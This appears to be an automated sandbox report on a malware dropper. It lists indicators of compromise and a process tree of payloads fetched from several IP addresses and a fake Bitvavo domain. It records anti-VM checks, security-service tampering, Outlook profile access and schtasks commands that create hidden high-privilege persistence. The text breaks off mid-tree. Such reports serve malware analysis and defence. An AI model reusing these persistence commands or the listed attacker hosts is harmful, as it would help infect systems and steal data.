http77.91.77.81lend27.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 3840 http77.91.77.81lend27.exe.exe 3840 http77.91.77.81lend27.exe.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4616 Setup.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeDebugPrivilege 5596 One.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeDebugPrivilege 5336 powershell.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeDebugPrivilege 5272 http77.91.77.82lendlook.exe.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeDebugPrivilege 5612 http77.91.77.81lendlook.exe.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeShutdownPrivilege 3188 chrome.exe Token: SeCreatePagefilePrivilege 3188 chrome.exe Token: SeIncreaseQuotaPrivilege 5336 powershell.exe Token: SeSecurityPrivilege 5336 powershell.exe Token: SeTakeOwnershipPrivilege 5336 powershell.exe Token: SeLoadDriverPrivilege 5336 powershell.exe Token: SeSystemProfilePrivilege 5336 powershell.exe Token: SeSystemtimePrivilege 5336 powershell.exe Token: SeProfSingleProcessPrivilege 5336 powershell.exe Token: SeIncBasePriorityPrivilege 5336 powershell.exe Token: SeCreatePagefilePrivilege 5336 powershell.exe Token: SeBackupPrivilege 5336 powershell.exe Token: SeRestorePrivilege 5336 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1712 http77.91.77.80mineamadka.exe.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 3188 chrome.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 6944 iydVgMPpiA_b127o2yze.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2952 c05a20d254.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4616 wrote to memory of 1304 4616 Setup.exe 74 PID 4616 wrote to memory of 1304 4616 Setup.exe 74 PID 4616 wrote to memory of 1304 4616 Setup.exe 74 PID 4616 wrote to memory of 1504 4616 Setup.exe 75 PID 4616 wrote to memory of 1504 4616 Setup.exe 75 PID 4616 wrote to memory of 1504 4616 Setup.exe 75 PID 1504 wrote to memory of 2124 1504 httptwizt.netnewtpp.exe.exe 76 PID 1504 wrote to memory of 2124 1504 httptwizt.netnewtpp.exe.exe 76 PID 1504 wrote to memory of 2124 1504 httptwizt.netnewtpp.exe.exe 76 PID 4616 wrote to memory of 3908 4616 Setup.exe 77 PID 4616 wrote to memory of 3908 4616 Setup.exe 77 PID 4616 wrote to memory of 3908 4616 Setup.exe 77 PID 4616 wrote to memory of 1736 4616 Setup.exe 78 PID 4616 wrote to memory of 1736 4616 Setup.exe 78 PID 4616 wrote to memory of 1736 4616 Setup.exe 78 PID 1304 wrote to memory of 2632 1304 http185.215.113.66pei.exe.exe 79 PID 1304 wrote to memory of 2632 1304 http185.215.113.66pei.exe.exe 79 PID 1304 wrote to memory of 2632 1304 http185.215.113.66pei.exe.exe 79 PID 3908 wrote to memory of 4784 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 80 PID 3908 wrote to memory of 4784 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 80 PID 3908 wrote to memory of 4784 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 80 PID 3908 wrote to memory of 4176 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 81 PID 3908 wrote to memory of 4176 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 81 PID 3908 wrote to memory of 4176 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 81 PID 4616 wrote to memory of 1712 4616 Setup.exe 83 PID 4616 wrote to memory of 1712 4616 Setup.exe 83 PID 4616 wrote to memory of 1712 4616 Setup.exe 83 PID 1712 wrote to memory of 4808 1712 http77.91.77.80mineamadka.exe.exe 84 PID 1712 wrote to memory of 4808 1712 http77.91.77.80mineamadka.exe.exe 84 PID 1712 wrote to memory of 4808 1712 http77.91.77.80mineamadka.exe.exe 84 PID 4616 wrote to memory of 1452 4616 Setup.exe 86 PID 4616 wrote to memory of 1452 4616 Setup.exe 86 PID 4616 wrote to memory of 1452 4616 Setup.exe 86 PID 4808 wrote to memory of 1724 4808 explortu.exe 87 PID 4808 wrote to memory of 1724 4808 explortu.exe 87 PID 4808 wrote to memory of 1724 4808 explortu.exe 87 PID 2124 wrote to memory of 2272 2124 sysmablsvr.exe 88 PID 2124 wrote to memory of 2272 2124 sysmablsvr.exe 88 PID 2124 wrote to memory of 2272 2124 sysmablsvr.exe 88 PID 4808 wrote to memory of 2952 4808 explortu.exe 89 PID 4808 wrote to memory of 2952 4808 explortu.exe 89 PID 4808 wrote to memory of 2952 4808 explortu.exe 89 PID 4808 wrote to memory of 1056 4808 explortu.exe 90 PID 4808 wrote to memory of 1056 4808 explortu.exe 90 PID 4808 wrote to memory of 1056 4808 explortu.exe 90 PID 1056 wrote to memory of 3188 1056 4e6762088f.exe 91 PID 1056 wrote to memory of 3188 1056 4e6762088f.exe 91 PID 3188 wrote to memory of 1032 3188 chrome.exe 93 PID 3188 wrote to memory of 1032 3188 chrome.exe 93 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 PID 3188 wrote to memory of 1124 3188 chrome.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 c05a20d254.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 c05a20d254.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\143303174.exeC:\Users\Admin\AppData\Local\Temp\143303174.exe4⤵
- Executes dropped EXE
PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\406625063.exeC:\Users\Admin\AppData\Local\Temp\406625063.exe5⤵
- Executes dropped EXE
PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\952927809.exeC:\Users\Admin\AppData\Local\Temp\952927809.exe5⤵
- Executes dropped EXE
PID:5240 -
C:\Users\Admin\AppData\Local\Temp\1453930929.exeC:\Users\Admin\AppData\Local\Temp\1453930929.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6100
-
-
-
C:\Users\Admin\AppData\Local\Temp\2026229022.exeC:\Users\Admin\AppData\Local\Temp\2026229022.exe5⤵
- Executes dropped EXE
PID:5136
-
-
C:\Users\Admin\AppData\Local\Temp\3235322023.exeC:\Users\Admin\AppData\Local\Temp\3235322023.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:5264 -
C:\Windows\winblrsnrcs.exeC:\Windows\winblrsnrcs.exe6⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:6044 -
C:\Users\Admin\AppData\Local\Temp\1338716755.exeC:\Users\Admin\AppData\Local\Temp\1338716755.exe7⤵
- Executes dropped EXE
PID:6220
-
-
C:\Users\Admin\AppData\Local\Temp\1222811284.exeC:\Users\Admin\AppData\Local\Temp\1222811284.exe7⤵PID:3192
-
-
C:\Users\Admin\AppData\Local\Temp\1621838176.exeC:\Users\Admin\AppData\Local\Temp\1621838176.exe7⤵PID:424
-
-
C:\Users\Admin\AppData\Local\Temp\1144214468.exeC:\Users\Admin\AppData\Local\Temp\1144214468.exe7⤵PID:7636
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe" --local-service4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe" --local-control4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4176
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.172.128.127tiktok.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.172.128.127tiktok.exe.exe"3⤵
- Executes dropped EXE
PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.80mineamadka.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.80mineamadka.exe.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"5⤵PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\1000016001\c05a20d254.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\c05a20d254.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:2952 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:5876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:4772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496 HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496 LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\iydVgMPpiA_b127o2yze.exe"C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\iydVgMPpiA_b127o2yze.exe"6⤵
- Suspicious use of SendNotifyMessage
PID:6944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:4080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6448
-
-
C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\lSgwDkC55WYzEXIFfTF0.exe"C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\lSgwDkC55WYzEXIFfTF0.exe"6⤵PID:4136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51 HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51 LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6508
-
-
C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\gA52NWlcCoqkZ_3pKAy9.exe"C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\gA52NWlcCoqkZ_3pKAy9.exe"6⤵PID:5908
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000017001\4e6762088f.exe"C:\Users\Admin\AppData\Local\Temp\1000017001\4e6762088f.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account6⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff800759758,0x7ff800759768,0x7ff8007597787⤵PID:1032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:27⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:2904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2068 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:5052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:17⤵PID:4436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2856 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:17⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3852 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:17⤵PID:2844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3240 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:17⤵PID:3500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4432 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:4728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5212 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:5304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:5348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:87⤵PID:5452
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82mineamadka.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82mineamadka.exe.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1452
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendalex.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendalex.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5412
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:5580
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendw.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendw.exe.exe"3⤵
- Executes dropped EXE
PID:5984 -
C:\Users\Admin\AppData\Local\Temp\s.exe"C:\Users\Admin\AppData\Local\Temp\s.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend228.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend228.exe.exe"3⤵
- Executes dropped EXE
PID:6128 -
